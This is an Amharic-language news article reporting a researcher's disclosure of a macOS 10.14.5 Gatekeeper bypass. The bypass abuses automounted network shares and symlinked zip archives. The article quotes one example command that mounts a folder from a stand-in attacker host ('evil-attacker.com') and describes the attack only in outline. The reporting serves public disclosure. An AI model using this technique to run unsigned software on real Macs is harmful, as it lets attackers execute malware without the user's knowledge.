አማያ ቶማን የደኅንነት ተመራማሪው ፊሊፖ ካቫላሪን በማክሮስ 10.14.5 ውስጥ ስላለው ስሕተቱ ማስጠንቀቂያ በብሎጉ ላይ አስቀምጧል። ይህ የበር ጠባቂውን የደህንነት እርምጃዎች ሙሉ በሙሉ የማለፍ እድልን ያካትታል። እንደ ካቫላሪን ገለጻ, በዚህ አመት የካቲት ወር ላይ ስህተቱን ለአፕል አመልክቷል, ነገር ግን ኩባንያው በአዲሱ ዝመና ውስጥ አላስተካከለውም.
በር ጠባቂ የተሰራው በአፕል ሲሆን በዴስክቶፕ ኦፕሬቲንግ ሲስተሙ ውስጥ ለመጀመሪያ ጊዜ በ2012 የተካተተ ሲሆን አፕሊኬሽኑ ያለተጠቃሚው እውቀት እና ፍቃድ እንዳይሰራ የሚያደርግ ዘዴ ነው። አንድ መተግበሪያ ካወረዱ በኋላ በር ጠባቂው ሶፍትዌሩ በትክክል በአፕል የተፈረመ መሆኑን ለማረጋገጥ ኮዱን በራስ-ሰር ይፈትሻል።
ሊሆን ይችላል ፍላጎትህ
በብሎግ ልኡክ ጽሁፍ ላይ ካቫላሪን በረኛ በነባሪነት ሁለቱንም ውጫዊ ማከማቻ እና የአውታረ መረብ ማጋራቶችን ደህንነቱ የተጠበቀ ቦታ አድርጎ ይመለከታቸዋል። በእነዚህ ዒላማዎች ውስጥ የሚኖር ማንኛውም መተግበሪያ በበር ጠባቂው ቼክ ውስጥ ሳያልፉ በራስ-ሰር መጀመር ይችላሉ። ተጠቃሚው ሳያውቅ ተንኮል አዘል ሶፍትዌሮችን ለመክፈት ሊበዘበዝ የሚችለው ይህ ባህሪ ነው።
ያልተፈቀደ መዳረሻን የሚፈቅደው አንዱ ገጽታ ራስ-ማውንት ባህሪ ነው፣ ይህም ተጠቃሚዎች በ"/net/" የሚጀምር ዱካ በመለየት በቀላሉ የአውታረ መረብ መጋራትን በራስ-ሰር እንዲጭኑ ያስችላቸዋል። እንደ ምሳሌ ካቫላሪን የ "ls/net/evil-attacker.com/sharedfolder/" ዱካ ይጠቅሳል ይህም ኦፕሬቲንግ ሲስተሙ የ"sharefolder" ፎልደርን ይዘቶች በሩቅ ቦታ እንዲጭን ሊያደርግ ይችላል ይህም አደገኛ ሊሆን ይችላል።
በቪዲዮው ውስጥ ማስፈራሪያው እንዴት እንደሚሰራ ማየት ይችላሉ-
ሌላው ምክንያት ወደ አውቶማውንት ተግባር የሚወስድ የተወሰነ ሲምሊንክ የያዘ ዚፕ መዝገብ ከተጋራ በበር ጠባቂ አይመረመርም። በዚህ መንገድ ተጎጂው በቀላሉ ተንኮል-አዘል ማህደሩን አውርዶ ዚፕ መክፈት ይችላል፣ ይህም አጥቂው ምንም አይነት ሶፍትዌር በ Mac ላይ ተጠቃሚው ሳያውቀው እንዲሰራ ያስችለዋል። በነባሪነት የተወሰኑ ቅጥያዎችን የሚደብቀው ፈላጊው የዚህ ተጋላጭነት ድርሻም አለው።
ካቫላሪን በብሎጉ ላይ እንደገለጸው አፕል በዚህ ዓመት የካቲት 22 ላይ ለ macOS ኦፕሬቲንግ ሲስተም ተጋላጭነት ትኩረት ስቧል ። ነገር ግን በግንቦት ወር አጋማሽ ላይ አፕል ከካቫላሪን ጋር መገናኘቱን አቆመ, ስለዚህ ካቫላሪን ሁሉንም ነገር ይፋ ለማድረግ ወሰነ.
ምንጭ FCVL
